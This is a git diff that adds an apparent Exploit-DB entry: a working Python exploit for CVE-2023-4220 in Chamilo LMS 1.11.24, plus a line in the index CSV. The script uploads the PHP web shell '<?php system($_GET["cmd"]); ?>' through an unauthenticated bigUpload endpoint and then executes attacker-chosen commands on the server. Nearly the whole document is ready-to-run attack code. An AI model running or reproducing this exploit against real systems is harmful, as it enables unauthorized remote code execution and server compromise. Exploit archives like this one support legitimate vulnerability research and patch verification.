diff --git a/exploits/php/webapps/52083.py b/exploits/php/webapps/52083.py
new file mode 100755
index 000000000..15a1ffbee
--- /dev/null
+++ b/exploits/php/webapps/52083.py
@@ -0,0 +1,65 @@
+# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
+# Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
+# Exploit Date: September 3, 2024
+# Vendor Homepage: https://chamilo.org/
+# Software Link: https://chamilo.org/
+# Version: 1.11.24 (Beersel)
+# Tested Versions: 1.11.24 (Beersel) - August 31, 2023
+# CVE ID: CVE-2023-4220
+# Vulnerability Type: Remote Code Execution
+# Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
+# Proof of Concept: Yes
+# Categories: Web Application, Remote Code Execution, File Upload
+# CVSS Score: 8.1 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+# Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable.
+# License: MIT License
+# References:
+# - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
+# - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
+# - Vendor Advisory: https://chamilo.org/
+
+import requests
+import argparse
+from urllib.parse import urljoin
+
+def upload_shell(target_url, payload_name):
+    upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported")
+    shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}"
+    shell_url = urljoin(target_url, shell_path)
+
+    # Payload containing the PHP web shell
+    files = {'bigUploadFile': (payload_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
+
+    # Upload the payload
+    response = requests.post(upload_url, files=files)
+
+    if response.status_code == 200:
+        print("[+] File uploaded successfully!")
+        print(f"[+] Access the shell at: {shell_url}?cmd=")
+    else:
+        print("[-] File upload failed.")
+
+def execute_command(shell_url, cmd):
+    # Execute the command
+    response = requests.get(f"{shell_url}?cmd={cmd}")
+    if response.status_code == 200:
+        print(f"[+] Command Output:\n{response.text}")
+    else:
+        print(f"[-] Failed to execute command at {shell_url}")
+
+if __name__ == "__main__":
+    # Parse command-line arguments
+    parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit")
+    parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)")
+    parser.add_argument('cmd', help="The command to execute on the remote server")
+    parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)")
+
+    args = parser.parse_args()
+
+    # Run the exploit with the provided arguments
+    upload_shell(args.target_url, args.shell)
+
+    # Form the shell URL to execute commands
+    shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}")
+    execute_command(shell_url, args.cmd)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a247366a5..51af04e6b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -15661,6 +15661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39474,exploits/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,webapps,php,,2016-02-19,2017-10-18,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1727
 50694,exploits/php/webapps/50694.txt,"Chamilo LMS 1.11.14 - Account Takeover",2022-02-02,sirpedrotavares,webapps,php,,2022-02-02,2022-02-02,0,CVE-2021-37391,,,,,
 49867,exploits/php/webapps/49867.py,"Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)",2021-05-14,"M. Cory Billington",webapps,php,,2021-05-14,2021-12-01,1,CVE-2021-31933,,,,,
+52083,exploits/php/webapps/52083.py,"Chamilo LMS 1.11.24 - Remote Code Execution (RCE)",2025-03-18,"Mohamed Kamel BOUZEKRIA",webapps,php,,2025-03-18,2025-03-18,0,CVE-2023-4220,,,,,
 45536,exploits/php/webapps/45536.txt,"Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting",2018-10-06,cakes,webapps,php,,2018-10-06,2018-10-08,1,,,,,http://www.exploit-db.comchamilo-1.11.8-php5.zip,
 45535,exploits/php/webapps/45535.txt,"Chamilo LMS 1.11.8 - Cross-Site Scripting",2018-10-05,cakes,webapps,php,,2018-10-05,2018-10-05,1,,,,,,
 36435,exploits/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",webapps,php,80,2015-03-19,2015-03-19,0,OSVDB-119789;OSVDB-119788;OSVDB-119787;OSVDB-119786;OSVDB-119785;OSVDB-119784;OSVDB-119783;OSVDB-119782;OSVDB-119781;OSVDB-119780;OSVDB-119779,,,,http://www.exploit-db.comchamilo-lms-1.9.10.tar.gz,